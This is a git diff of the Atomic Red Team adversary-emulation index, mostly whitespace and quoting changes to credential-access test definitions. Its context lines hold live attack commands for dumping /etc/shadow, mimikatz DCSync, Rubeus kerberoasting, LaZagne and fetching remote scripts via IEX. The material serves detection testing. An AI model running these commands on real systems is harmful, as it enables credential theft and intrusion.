Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b54288eb..167324d3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,13 +80,13 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh - name: Access /etc/{shadow,passwd} with a standard bin that's not cat auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a description: 'Dump /etc/passwd and /etc/shadow using ed -' + ' supported_platforms: - linux input_arguments: 
@@ -97,17 +97,17 @@ credential-access: executor: command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file} -' + ' cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/{shadow,passwd} with shell builtins auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713 description: 'Dump /etc/passwd and /etc/shadow using bash builtins -' + ' supported_platforms: - linux input_arguments: @@ -122,7 +122,7 @@ credential-access: testcat /etc/shadow > #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true T1557.002: @@ -313,32 +313,32 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}" -' + ' cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false T1552.003: @@ -393,7 +393,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -415,7 +415,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -650,7 +650,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. -' + ' supported_platforms: - containers input_arguments: 
@@ -661,17 +661,17 @@ credential-access: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get secrets -n #{namespace} -' + ' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -679,7 +679,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. -' + ' supported_platforms: - linux dependency_executor_name: sh @@ -687,24 +687,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -712,14 +712,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl 
@@ -727,19 +727,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod -' + ' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity -' + ' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod -' + ' T1056.004: technique: external_references: @@ -841,7 +841,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: @@ -857,10 +857,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -946,7 +946,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - linux input_arguments: @@ -958,16 +958,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; -' + ' executor: name: bash elevation_required: false 
@@ -979,7 +979,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - macos input_arguments: @@ -991,11 +991,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -1091,14 +1091,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux @@ -1110,14 +1110,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1143,7 +1143,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -' + ' supported_platforms: - macos - linux @@ -1207,7 +1207,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1218,7 +1218,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -1227,7 +1227,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1254,7 +1254,7 @@ credential-access: command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'' -UseBasicParsing); Get-CredManCreds -Force -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d @@ -1267,7 +1267,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Windows Credentials" /all -' + ' - name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e @@ -1280,7 +1280,7 @@ credential-access: elevation_required: false command: 'vaultcmd /listcreds:"Web Credentials" /all -' + ' T1555.003: technique: created: '2020-02-12T18:57:36.041Z' @@ -1392,11 +1392,11 @@ credential-access: dependencies: - description: 'Modified Sysinternals must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip" @@ -1409,7 +1409,7 @@ credential-access: cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction Ignore -' + ' name: powershell - name: Search macOS Safari Cookies auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b 
@@ -1446,10 +1446,10 @@ credential-access: dependencies: - description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path}) -' + ' prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}" @@ -1467,7 +1467,7 @@ credential-access: dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -1495,7 +1495,7 @@ credential-access: dependencies: - description: 'Opera must be installed -' + ' prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1} @@ -1507,23 +1507,23 @@ credential-access: Stop-Process -Name "opera" - description: 'Opera login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1} get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File -' + ' executor: name: powershell command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data" -Destination $env:temp -' + ' cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction Ignore -' + ' - name: Simulating access to Windows Firefox Login Data auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c description: | 
@@ -1535,7 +1535,7 @@ credential-access: dependencies: - description: 'Firefox must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1} @@ -1546,7 +1546,7 @@ credential-access: Start-Process $installer -ArgumentList '/S' -Wait - description: 'Firefox login data file must exist -' + ' prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1} get_prereq_command: | @@ -1560,7 +1560,7 @@ credential-access: command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination $env:temp -Force -' + ' cleanup_command: Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction Ig T1552.002: @@ -1620,7 +1620,7 @@ credential-access: description: 'Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1638,7 +1638,7 @@ credential-access: executor: command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s -' + ' name: command_prompt T1003.006: technique: @@ -1755,7 +1755,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -1772,7 +1772,7 @@ credential-access: command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" -' + ' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. -' + ' supported_platforms: - windows input_arguments: 
@@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" -' + ' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' -' + ' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) -' + ' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: name: powershell elevation_required: false 
@@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. -' + ' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml -' + ' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} -' + ' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } -' + ' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' - description: 'Rubeus must exist -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} -' + ' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'setspn -T #{domain_name} -Q */* -' + ' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 
@@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ 